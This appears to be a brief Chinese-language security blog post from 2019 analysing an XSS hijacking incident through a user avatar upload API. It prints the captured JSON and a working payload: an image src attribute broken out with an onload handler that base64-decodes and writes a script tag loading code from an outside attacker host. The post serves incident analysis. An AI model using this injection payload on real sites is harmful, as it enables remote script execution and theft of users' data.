Neurohazard
暮雲煙月,皓首窮經;森羅萬象,如是我聞。

遇到的一起 JavaScript 劫持事件

wpadmin~January 29, 2019 /InfoSec

遇到的一起 JavaScript 劫持事件

XSS JavaScript hijacking

基本信息

用户头像接口被恶意攻击者利用

{
    "content": [
        {
            "t": "p",
            "a": {},
            "c": [
                {
                    "t": "k-tu",
                    "a": {
                        "id": "3FO3FNEBU9QB",
                        "src": "https://xxx.com/2019/01/19/SUQOUVOOS3SUIZ4XLQM6YNY8_180x90.jpg \" onload=\"document['write'](atob('PHNjcmlwdCBzcmM9Ly9hcGkuNTFiamJqLmNvbS9qPjwvc2NyaXB0Pg=='))\"\r\n"
                    }
                },
                "fhiahoiahrgaoerhgiuariuaprgaghaiurghauirehgapeurigaergaerhguiarhgap"
            ]
        }
    ]
}

关键恶意载荷

" onload="document['write'](atob('PHNjcmlwdCBzcmM9Ly9hcGkuNTFiamJqLmNvbS9qPjwvc2NyaXB0Pg=='))"\r\n

<script src=//api.51bjbj.com/j></script>

不过由于攻击者很快删除了位于 https://api.51bjbj.com/j 的脚本,无法进行进一步分析。

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.